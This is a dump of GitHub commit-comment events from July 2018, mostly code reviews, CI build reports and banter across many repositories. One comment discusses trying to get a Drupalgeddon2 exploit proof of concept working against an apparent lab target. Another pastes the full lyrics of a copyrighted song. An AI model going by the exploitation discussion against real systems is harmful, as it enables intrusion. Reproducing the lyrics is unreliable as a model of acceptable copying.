{"id":"8040535702","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29894567,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-30T22:00:00Z","updated_at":"2018-07-30T22:00:00Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1702 of 1702 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.08%25-green.png)</a>\n"}},"created_at":"2018-07-30T22:00:00Z"}
{"id":"8040538648","type":"CommitCommentEvent","actor":{"login":"svaarala"},"repo":{"name":"svaarala/duktape"},"payload":{"comment":{"id":29894582,"position":5,"line":1515,"path":"src-input/duk_bi_string.c","commit_id":"463394aa1c39cf321639a9d6c724f50a53bdcd38","created_at":"2018-07-30T22:00:31Z","updated_at":"2018-07-30T22:00:31Z","author_association":"OWNER","body":"There is an unsigned overflow in the original so that if blen_search > DUK_HSTRING_GET_BYTELEN(h) the value added on the RHS has overflowed. A similar reason applies to the other diff."}},"created_at":"2018-07-30T22:00:31Z"}
{"id":"8040539073","type":"CommitCommentEvent","actor":{"login":"Kodehawa"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29894583,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-30T22:00:34Z","updated_at":"2018-07-30T22:00:34Z","author_association":"MEMBER","body":"this is so sad alexa Caused by: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('}' (code 125)): was expecting double-quote to start field name\r\n"}},"created_at":"2018-07-30T22:00:34Z"}
{"id":"8040539145","type":"CommitCommentEvent","actor":{"login":"exemploPoliedro"},"repo":{"name":"exemploPoliedro/novinho"},"payload":{"comment":{"id":29894584,"position":null,"line":null,"path":null,"commit_id":"34d9700300b4a2e5dac5cadf9b64399de4ee20ce","created_at":"2018-07-30T22:00:35Z","updated_at":"2018-07-30T22:00:35Z","author_association":"OWNER","body":"haha"}},"created_at":"2018-07-30T22:00:35Z"}
{"id":"8040541417","type":"CommitCommentEvent","actor":{"login":"Kodehawa"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29894589,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-30T22:00:58Z","updated_at":"2018-07-30T22:00:58Z","author_association":"MEMBER","body":"reminder for myself add an unit test for i18n initialization on build"}},"created_at":"2018-07-30T22:00:58Z"}
{"id":"8040543138","type":"CommitCommentEvent","actor":{"login":"mortberg"},"repo":{"name":"mortberg/cubicaltt"},"payload":{"comment":{"id":29894596,"position":null,"line":null,"path":null,"commit_id":"130165cba5b214b0eda70ce46b131f7ce581df15","created_at":"2018-07-30T22:01:16Z","updated_at":"2018-07-30T22:01:16Z","author_association":"OWNER","body":"*sunglass emoji*"}},"created_at":"2018-07-30T22:01:16Z"}
{"id":"8040544375","type":"CommitCommentEvent","actor":{"login":"SaintHellcom"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29894598,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-30T22:01:29Z","updated_at":"2018-07-30T22:01:29Z","author_association":"NONE","body":"@RyanFlemming\r\nChyba\tCS1061\tDateTime neobsahuje definici pro HasValue a nenašla se žádná metoda rozšíření HasValue, která by přijímala první argument typu DateTime. (Nechybí direktiva using nebo odkaz na sestavení?)\t\r\nChyba\tCS0119\tValueExtensions.Value(HtmlHelper, string) je metoda, což není platné v daném kontextu.\t"}},"created_at":"2018-07-30T22:01:29Z"}
{"id":"8040544808","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29894601,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-30T22:01:33Z","updated_at":"2018-07-30T22:01:33Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-30T22:01:33Z"}
{"id":"8040544972","type":"CommitCommentEvent","actor":{"login":"MrLar"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29894603,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-30T22:01:35Z","updated_at":"2018-07-30T22:01:35Z","author_association":"MEMBER","body":"JsOn ErRrOr HiGhLiGhInG"}},"created_at":"2018-07-30T22:01:35Z"}
{"id":"8040547158","type":"CommitCommentEvent","actor":{"login":"Kodehawa"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29894608,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-30T22:02:00Z","updated_at":"2018-07-30T22:02:00Z","author_association":"MEMBER","body":"no u "}},"created_at":"2018-07-30T22:02:00Z"}
{"id":"8040549226","type":"CommitCommentEvent","actor":{"login":"robertohuertasm"},"repo":{"name":"robertohuertasm/url-checker"},"payload":{"comment":{"id":29894612,"position":21,"line":21,"path":"src/lib.rs","commit_id":"ae0454895b8c5a4dda9a0f21230433955e352778","created_at":"2018-07-30T22:02:28Z","updated_at":"2018-07-30T22:02:28Z","author_association":"OWNER","body":"You're absolutely right!"}},"created_at":"2018-07-30T22:02:28Z"}
{"id":"8040549496","type":"CommitCommentEvent","actor":{"login":"rbiasini"},"repo":{"name":"emmertex/openpilot"},"payload":{"comment":{"id":29894613,"position":27,"line":27,"path":"panda/board/safety/safety_hyundai.h","commit_id":"292f505c7fc05d0925336de82770fcb004521db8","created_at":"2018-07-30T22:02:31Z","updated_at":"2018-07-30T22:02:31Z","author_association":"NONE","body":"0x340"}},"created_at":"2018-07-30T22:02:31Z"}
{"id":"8040549598","type":"CommitCommentEvent","actor":{"login":"Vrontis"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29894614,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-30T22:02:33Z","updated_at":"2018-07-30T22:02:33Z","author_association":"NONE","body":"this is so sad alexa pls use no u against kode"}},"created_at":"2018-07-30T22:02:33Z"}
{"id":"8040549646","type":"CommitCommentEvent","actor":{"login":"nishen28"},"repo":{"name":"rfavignano/Sudoku"},"payload":{"comment":{"id":29894615,"position":null,"line":null,"path":null,"commit_id":"a30469f3dcf2cdbd508fb675bdf3f98e0a6e582c","created_at":"2018-07-30T22:02:33Z","updated_at":"2018-07-30T22:02:33Z","author_association":"NONE","body":"The new solution also fails to give the output due to too much recursion in the code"}},"created_at":"2018-07-30T22:02:33Z"}
{"id":"8040552171","type":"CommitCommentEvent","actor":{"login":"queer"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29894624,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-30T22:03:11Z","updated_at":"2018-07-30T22:03:11Z","author_association":"CONTRIBUTOR","body":"Ay \r\nFonsi \r\nDY \r\nOh\r\nOh no, oh no\r\nOh yeah\r\nDiridiri, dirididi Daddy \r\nGo\r\nSí, sabes que ya llevo un rato mirándote \r\nTengo que bailar contigo hoy (DY) \r\nVi que tu mirada ya estaba llamándome \r\nMuéstrame el camino que yo voy (Oh)\r\nTú, tú eres el imán y yo soy el metal \r\nMe voy acercando y voy armando el plan \r\nSolo con pensarlo se acelera el pulso (Oh yeah)\r\nYa, ya me está gustando más de lo normal \r\nTodos mis sentidos van pidiendo más \r\nEsto hay que tomarlo sin ningún apuro\r\nDespacito \r\nQuiero respirar tu cuello despacito \r\nDeja que te diga cosas al oído \r\nPara que te acuerdes si no estás conmigo\r\nDespacito \r\nQuiero desnudarte a besos despacito \r\nFirmo en las paredes de tu laberinto \r\nY hacer de tu cuerpo todo un manuscrito (sube, sube, sube)\r\n(Sube, sube)\r\nQuiero ver bailar tu pelo \r\nQuiero ser tu ritmo \r\nQue le enseñes a mi boca \r\nTus lugares favoritos (favoritos, favoritos baby)\r\nDéjame sobrepasar tus zonas de peligro \r\nHasta provocar tus gritos \r\nY que olvides tu apellido (Diridiri, dirididi Daddy)\r\nSi te pido un beso ven dámelo \r\nYo sé que estás pensándolo \r\nLlevo tiempo intentándolo \r\nMami, esto es dando y dándolo \r\nSabes que tu corazón conmigo te hace bom, bom \r\nSabes que esa beba está buscando de mi bom, bom \r\nVen prueba de mi boca para ver cómo te sabe \r\nQuiero, quiero, quiero ver cuánto amor a ti te cabe \r\nYo no tengo prisa, yo me quiero dar el viaje \r\nEmpecemos lento, después salvaje\r\nPasito a pasito, suave suavecito \r\nNos vamos pegando poquito a poquito \r\nCuando tú me besas con esa destreza \r\nVeo que eres malicia con delicadeza\r\nPasito a pasito, suave suavecito \r\nNos vamos pegando, poquito a poquito \r\nY es que esa belleza es un rompecabezas \r\nPero pa montarlo aquí tengo la pieza\r\nDespacito \r\nQuiero respirar tu cuello despacito \r\nDeja que te diga cosas al oído \r\nPara que te acuerdes si no estás conmigo\r\nDespacito \r\nQuiero desnudarte a besos despacito \r\nFirmo en las paredes de tu laberinto \r\nY hacer de tu cuerpo todo un manuscrito (sube, sube, sube)\r\n(Sube, sube)\r\nQuiero ver bailar tu pelo \r\nQuiero ser tu ritmo \r\nQue le enseñes a mi boca \r\nTus lugares favoritos (favoritos, favoritos baby)\r\nDéjame sobrepasar tus zonas de peligro \r\nHasta provocar tus gritos \r\nY que olvides tu apellido\r\nDespacito \r\nVamos a hacerlo en una playa en Puerto Rico \r\nHasta que las olas griten \"¡ay, bendito!\" \r\nPara que mi sello se quede contigo\r\nPasito a pasito, suave suavecito \r\nNos vamos pegando, poquito a poquito \r\nQue le enseñes a mi boca \r\nTus lugares favoritos (favoritos, favoritos baby)\r\nPasito a pasito, suave suavecito \r\nNos vamos pegando, poquito a poquito \r\nHasta provocar tus gritos \r\nY que olvides tu apellido (DY)\r\nDespacito"}},"created_at":"2018-07-30T22:03:11Z"}
{"id":"8040552321","type":"CommitCommentEvent","actor":{"login":"rbiasini"},"repo":{"name":"emmertex/openpilot"},"payload":{"comment":{"id":29894625,"position":69,"line":69,"path":"panda/board/safety/safety_hyundai.h","commit_id":"292f505c7fc05d0925336de82770fcb004521db8","created_at":"2018-07-30T22:03:13Z","updated_at":"2018-07-30T22:03:13Z","author_association":"NONE","body":"0x394"}},"created_at":"2018-07-30T22:03:13Z"}
{"id":"8040553033","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29894629,"position":51,"line":105,"path":"oauth2/oauth2-resource-server/src/main/java/org/springframework/security/oauth2/server/resource/authentication/JwtAuthenticationProvider.java","commit_id":"2c7c48b79fcebb5162a1ff1b5394ee47eb3bbd94","created_at":"2018-07-30T22:03:24Z","updated_at":"2018-07-30T22:03:24Z","author_association":"OWNER","body":"Taking the first error and returning that.\r\n\r\nThe reason for this is because the spec indicates that there can be only one \"error_description\" field in the WWW-Authenticate response header. We could possibly concatenate all errors, but we lose some precision at the point in the code if we, for example, take all the descriptions and comma-delimit them since we allow the user to send back an entire OAuth2Error.\r\n\r\nOne idea I had was to pass all details into a new exception that extends from OAuth2AuthenticationException, e.g. OAuth2DetailedAuthenticationException. Then, users could simply wire a new AuthenticationEntryPoint which renders all the errors in whatever custom way the user wants.\r\n\r\n"}},"created_at":"2018-07-30T22:03:24Z"}
{"id":"8040553142","type":"CommitCommentEvent","actor":{"login":"MrLar"},"repo":{"name":"Mantaro/MantaroBot"},"payload":{"comment":{"id":29894630,"position":null,"line":null,"path":null,"commit_id":"0dcd2bb7878b3c88eb173bf48386f535077e00e6","created_at":"2018-07-30T22:03:26Z","updated_at":"2018-07-30T22:03:26Z","author_association":"MEMBER","body":"amy pls"}},"created_at":"2018-07-30T22:03:26Z"}
{"id":"8040554254","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29894638,"position":null,"line":null,"path":null,"commit_id":"59224138cbac543817febcd471f358519c002312","created_at":"2018-07-30T22:03:40Z","updated_at":"2018-07-30T22:03:40Z","author_association":"COLLABORATOR","body":"<h3>[ControlGroup] Give border radius to :only-child (#2734)</h3>\n\nPreview: <strong><a href='https://19265-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19265-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19265-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-30T22:03:40Z"}
{"id":"8040556179","type":"CommitCommentEvent","actor":{"login":"3DExtended"},"repo":{"name":"llSourcell/Generative_Adversarial_networks_LIVE"},"payload":{"comment":{"id":29894643,"position":334,"line":334,"path":"EZGAN.ipynb","commit_id":"179900ac8b667a334db0cd131ef93b1f43d1cd11","created_at":"2018-07-30T22:04:10Z","updated_at":"2018-07-30T22:04:10Z","author_association":"NONE","body":"Could you explain me, why you used 0.9 instead of 1.0 here?"}},"created_at":"2018-07-30T22:04:10Z"}
{"id":"8040557061","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29894644,"position":null,"line":null,"path":null,"commit_id":"8eb22e966edf580f2d1ece87e5750d20e2834aab","created_at":"2018-07-30T22:04:23Z","updated_at":"2018-07-30T22:04:23Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-299](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-299).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-299-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-30T22:04:23Z"}
{"id":"8040558795","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29894649,"position":null,"line":null,"path":null,"commit_id":"33530b504f812dcdf7860458eb14cf9a61213886","created_at":"2018-07-30T22:04:50Z","updated_at":"2018-07-30T22:04:50Z","author_association":"OWNER","body":"Lots of comments:\r\n- changes to GlassBR/Unitals and SWHS/Unitals are great\r\n- using `showEFloat` in HTML/Printer is excellent\r\n- you seem to have added a lot of imports (from `Data.List` and `Data.Tuple`) to `Printing.Import` which are not actually used?\r\n- You use `P.Point` and `P.Dot` to mean the same thing?\r\n- Does the TeX version print in 'engineering' notation? I don't see where the 'e' gets output?"}},"created_at":"2018-07-30T22:04:50Z"}
{"id":"8040561160","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29894656,"position":100,"line":100,"path":"oauth2/oauth2-resource-server/src/main/java/org/springframework/security/oauth2/server/resource/authentication/JwtTimestampTokenValidator.java","commit_id":"2c7c48b79fcebb5162a1ff1b5394ee47eb3bbd94","created_at":"2018-07-30T22:05:25Z","updated_at":"2018-07-30T22:05:25Z","author_association":"OWNER","body":"This is the result of community feedback. The `Clock` javadoc [indicates](https://docs.oracle.com/javase/8/docs/api/java/time/Clock.html) that such a setting is useful whenever Instant.now is invoked."}},"created_at":"2018-07-30T22:05:25Z"}
{"id":"8040562519","type":"CommitCommentEvent","actor":{"login":"TomConlin"},"repo":{"name":"monarch-initiative/dipper"},"payload":{"comment":{"id":29894660,"position":null,"line":null,"path":null,"commit_id":"ceb7180179d41b87574dbdca7bf5fb01b7622841","created_at":"2018-07-30T22:05:45Z","updated_at":"2018-07-30T22:05:45Z","author_association":"MEMBER","body":"\r\nclose but no cigar.\r\n\r\nthe keys need to be the actual ontology labels as given  \r\n\r\nso for example for line 91\r\n    \"QTM\": \"ECO:0000061\"\r\n\r\nqtm is not the term ECO:0000061's label\r\nfrom: \r\nhttps://microbialphenotypes.org/wiki/index.php/Category:ECO:0000061_!_quantitative_trait_analysis_evidence\r\nwe see that the global translation table gets:  \r\n\r\n    'quantitative trait analysis evidence': 'ECO:0000061'\r\n\r\nand the local translation table would get:\r\n\r\n    'QTM' : 'quantitative trait analysis evidence'\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-30T22:05:45Z"}
{"id":"8040563034","type":"CommitCommentEvent","actor":{"login":"Bubu"},"repo":{"name":"Telegram-FOSS-Team/Telegram-FOSS"},"payload":{"comment":{"id":29894661,"position":96,"line":84,"path":"README.md","commit_id":"c39e94a621c5f3b3b43e8f5e5b1cac6ddc28895e","created_at":"2018-07-30T22:05:53Z","updated_at":"2018-07-30T22:05:53Z","author_association":"COLLABORATOR","body":"missing export NINJA_PATH"}},"created_at":"2018-07-30T22:05:53Z"}
{"id":"8040565764","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29894668,"position":153,"line":266,"path":"oauth2/oauth2-resource-server/src/test/java/org/springframework/security/oauth2/server/resource/authentication/JwtAuthenticationProviderTests.java","commit_id":"2c7c48b79fcebb5162a1ff1b5394ee47eb3bbd94","created_at":"2018-07-30T22:06:33Z","updated_at":"2018-07-30T22:06:33Z","author_association":"OWNER","body":"These are both public calls, e.g. getError().getDescription()."}},"created_at":"2018-07-30T22:06:33Z"}
{"id":"8040565794","type":"CommitCommentEvent","actor":{"login":"Bubu"},"repo":{"name":"Telegram-FOSS-Team/Telegram-FOSS"},"payload":{"comment":{"id":29894669,"position":96,"line":84,"path":"README.md","commit_id":"c39e94a621c5f3b3b43e8f5e5b1cac6ddc28895e","created_at":"2018-07-30T22:06:33Z","updated_at":"2018-07-30T22:06:33Z","author_association":"COLLABORATOR","body":"maybe explicitly state r16v here again."}},"created_at":"2018-07-30T22:06:33Z"}
{"id":"8040569435","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29894686,"position":121,"line":274,"path":"config/src/main/java/org/springframework/security/config/annotation/web/configurers/oauth2/server/resource/OAuth2ResourceServerConfigurer.java","commit_id":"2c7c48b79fcebb5162a1ff1b5394ee47eb3bbd94","created_at":"2018-07-30T22:07:28Z","updated_at":"2018-07-30T22:07:28Z","author_association":"OWNER","body":"The intended logic here is that the ApplicationContext will only be consulted if `addTokenValidators` was not invoked."}},"created_at":"2018-07-30T22:07:28Z"}
{"id":"8040572024","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"kurakste/yii2homework"},"payload":{"comment":{"id":29894689,"position":80,"line":56,"path":"models/User.php","commit_id":"474e1f877806bcc3cd204cb78420d74ff553b74a","created_at":"2018-07-30T22:08:08Z","updated_at":"2018-07-30T22:08:08Z","author_association":"NONE","body":"Используй по возможности константу ::class - className это обратная совместимость для старых php, которая скоро будет выпилена"}},"created_at":"2018-07-30T22:08:08Z"}
{"id":"8040573548","type":"CommitCommentEvent","actor":{"login":"RyanFlemming"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29894692,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-30T22:08:31Z","updated_at":"2018-07-30T22:08:31Z","author_association":"NONE","body":"OK. In your customer class, is BirthDate nullable? i.e. `public DateTime? BirthDate { get; set; }`\r\nDateTime and DateTime? are two different types."}},"created_at":"2018-07-30T22:08:31Z"}
{"id":"8040573815","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29894695,"position":43,"line":43,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/DelegatingOAuth2TokenValidator.java","commit_id":"2c7c48b79fcebb5162a1ff1b5394ee47eb3bbd94","created_at":"2018-07-30T22:08:35Z","updated_at":"2018-07-30T22:08:35Z","author_association":"OWNER","body":"Collecting all errors instead of just returning the first one."}},"created_at":"2018-07-30T22:08:35Z"}
{"id":"8040574239","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"kurakste/yii2homework"},"payload":{"comment":{"id":29894696,"position":187,"line":143,"path":"models/User.php","commit_id":"474e1f877806bcc3cd204cb78420d74ff553b74a","created_at":"2018-07-30T22:08:41Z","updated_at":"2018-07-30T22:08:41Z","author_association":"NONE","body":"Комментарии так же выпиливай из кода)"}},"created_at":"2018-07-30T22:08:41Z"}
{"id":"8040574414","type":"CommitCommentEvent","actor":{"login":"jonsterling"},"repo":{"name":"mortberg/cubicaltt"},"payload":{"comment":{"id":29894698,"position":null,"line":null,"path":null,"commit_id":"130165cba5b214b0eda70ce46b131f7ce581df15","created_at":"2018-07-30T22:08:44Z","updated_at":"2018-07-30T22:08:44Z","author_association":"NONE","body":"A genuine power move "}},"created_at":"2018-07-30T22:08:44Z"}
{"id":"8040574675","type":"CommitCommentEvent","actor":{"login":"mirandali17"},"repo":{"name":"mirandali17/website"},"payload":{"comment":{"id":29894700,"position":null,"line":null,"path":null,"commit_id":"6ea3000409f0df1b0bb6ada02c600ffa6b183413","created_at":"2018-07-30T22:08:48Z","updated_at":"2018-07-30T22:08:48Z","author_association":"OWNER","body":"Associating with #3 with this commit."}},"created_at":"2018-07-30T22:08:48Z"}
{"id":"8040577677","type":"CommitCommentEvent","actor":{"login":"polubelova"},"repo":{"name":"project-everest/hacl-star"},"payload":{"comment":{"id":29894710,"position":12,"line":93,"path":"lib/fst/Lib.Sequence.fst","commit_id":"b2b76126cb5c43c40a1d93229a726b2e16e5a34d","created_at":"2018-07-30T22:09:32Z","updated_at":"2018-07-30T22:09:32Z","author_association":"COLLABORATOR","body":"Right. My bad"}},"created_at":"2018-07-30T22:09:32Z"}
{"id":"8040578365","type":"CommitCommentEvent","actor":{"login":"jzheaux"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29894713,"position":76,"line":76,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/OAuth2TokenValidatorResult.java","commit_id":"2c7c48b79fcebb5162a1ff1b5394ee47eb3bbd94","created_at":"2018-07-30T22:09:42Z","updated_at":"2018-07-30T22:09:42Z","author_association":"OWNER","body":"Granted, this is a bit of a pre-optimization; however it seems to me that successes will be much more common than failures, so this will pay off."}},"created_at":"2018-07-30T22:09:42Z"}
{"id":"8040578520","type":"CommitCommentEvent","actor":{"login":"jlcarvalho"},"repo":{"name":"Futuring/futuring.com.br"},"payload":{"comment":{"id":29894714,"position":null,"line":null,"path":null,"commit_id":"a81ace8146e65b859a047b7ed68ff7bbd33ccada","created_at":"2018-07-30T22:09:45Z","updated_at":"2018-07-30T22:09:45Z","author_association":"CONTRIBUTOR","body":"\n<h3>Update deps and add Filesquash</h3>\nDemo: <strong><a href='undefined' target='_blank'>undefined</a></strong>\n"}},"created_at":"2018-07-30T22:09:45Z"}
{"id":"8040580727","type":"CommitCommentEvent","actor":{"login":"Rapster"},"repo":{"name":"primefaces/primefaces"},"payload":{"comment":{"id":29894726,"position":null,"line":null,"path":null,"commit_id":"43bb450d3bc638400a42aa9b225032dbd4725c7f","created_at":"2018-07-30T22:10:17Z","updated_at":"2018-07-30T22:10:17Z","author_association":"MEMBER","body":"Because the var has to be there in case `isDisableSelection()` is called (whatever there is a model or a list)"}},"created_at":"2018-07-30T22:10:17Z"}
{"id":"8040581179","type":"CommitCommentEvent","actor":{"login":"damacus"},"repo":{"name":"sous-chefs/apache2"},"payload":{"comment":{"id":29894729,"position":null,"line":null,"path":null,"commit_id":"806e4511e66b720797bc6b3c14235f07de6026c4","created_at":"2018-07-30T22:10:24Z","updated_at":"2018-07-30T22:10:24Z","author_association":"MEMBER","body":"Thanks for the sanity review. "}},"created_at":"2018-07-30T22:10:24Z"}
{"id":"8040582620","type":"CommitCommentEvent","actor":{"login":"PascalSchumacher"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29894731,"position":13,"line":53,"path":"spring-webflux/src/main/java/org/springframework/web/reactive/socket/adapter/NettyWebSocketSessionSupport.java","commit_id":"4a147d26fcd086ffc4d495e34b6d1b54854c345b","created_at":"2018-07-30T22:10:44Z","updated_at":"2018-07-30T22:10:44Z","author_association":"CONTRIBUTOR","body":"Shouldn't this variable name have remained all uppercase, as it a constant? (Just wondering.)"}},"created_at":"2018-07-30T22:10:44Z"}
{"id":"8040585540","type":"CommitCommentEvent","actor":{"login":"MeteoricDragon"},"repo":{"name":"Interkarma/daggerfall-unity"},"payload":{"comment":{"id":29894743,"position":14,"line":312,"path":"Assets/Scripts/Game/PlayerEnterExit.cs","commit_id":"b02c1dee1c2f22e245aa98782d5792eebd501ad2","created_at":"2018-07-30T22:11:31Z","updated_at":"2018-07-30T22:11:31Z","author_association":"CONTRIBUTOR","body":"@Allofich  @Interkarma  where is an easily accessible place that I can test going into dungeon water?"}},"created_at":"2018-07-30T22:11:31Z"}
{"id":"8040586998","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29894746,"position":237,"line":1168,"path":"code/drasil-example/Drasil/SWHS/Body.hs","commit_id":"04136f622b83bfb2748ad8cf3edfa5d456f3ff1b","created_at":"2018-07-30T22:11:55Z","updated_at":"2018-07-30T22:11:55Z","author_association":"OWNER","body":"What I see in this check-in are 32 lines being deleted -- this routine was obsolete?"}},"created_at":"2018-07-30T22:11:55Z"}
{"id":"8040588620","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29894750,"position":92,"line":406,"path":"code/drasil-example/Drasil/SWHS/Body.hs","commit_id":"04136f622b83bfb2748ad8cf3edfa5d456f3ff1b","created_at":"2018-07-30T22:12:19Z","updated_at":"2018-07-30T22:12:19Z","author_association":"OWNER","body":"Are all the following also not used?"}},"created_at":"2018-07-30T22:12:19Z"}
{"id":"8040591326","type":"CommitCommentEvent","actor":{"login":"phillip-McCrevice"},"repo":{"name":"officialhocc/test"},"payload":{"comment":{"id":29894757,"position":null,"line":null,"path":null,"commit_id":"5968fea7f19f4dacc92695f416ce938bc3f5df25","created_at":"2018-07-30T22:13:03Z","updated_at":"2018-07-30T22:13:03Z","author_association":"NONE","body":"how did you get drupalgeddon2 poc to work? it seems that robots.txt is keeping it from finding the changelog.txt page or anything else that would point it towards the drupal version. I found firewall.sh through the ftp server in the ... directory im not sure if its useful or not although it seems to be there for a reason. just not sure how to proceed "}},"created_at":"2018-07-30T22:13:03Z"}
{"id":"8040595570","type":"CommitCommentEvent","actor":{"login":"screwer"},"repo":{"name":"SFML/SFML"},"payload":{"comment":{"id":29894771,"position":null,"line":null,"path":null,"commit_id":"2627c3579fd51f96d3bb286f9980b9a3fece6b16","created_at":"2018-07-30T22:14:10Z","updated_at":"2018-07-30T22:14:10Z","author_association":"NONE","body":"Issue with this change: function getInitializedDisplay does not return anything, if platform differs from Linux/Android. There are compilation error."}},"created_at":"2018-07-30T22:14:10Z"}
{"id":"8040599275","type":"CommitCommentEvent","actor":{"login":"morgo"},"repo":{"name":"pingcap/tidb"},"payload":{"comment":{"id":29894780,"position":5,"line":48,"path":"config/config.toml.example","commit_id":"33367fdd48bf10560a11347ff2d904fbb723b3b9","created_at":"2018-07-30T22:15:05Z","updated_at":"2018-07-30T22:15:05Z","author_association":"NONE","body":"s/behand/behind/ :-)"}},"created_at":"2018-07-30T22:15:05Z"}
{"id":"8040599370","type":"CommitCommentEvent","actor":{"login":"Kosterio"},"repo":{"name":"semushina/The_movie_rent"},"payload":{"comment":{"id":29894781,"position":null,"line":null,"path":null,"commit_id":"98805a027a46e00c8c1f2cb9e42c5839e2e7d469","created_at":"2018-07-30T22:15:07Z","updated_at":"2018-07-30T22:15:07Z","author_association":"NONE","body":"лайк подписка"}},"created_at":"2018-07-30T22:15:07Z"}
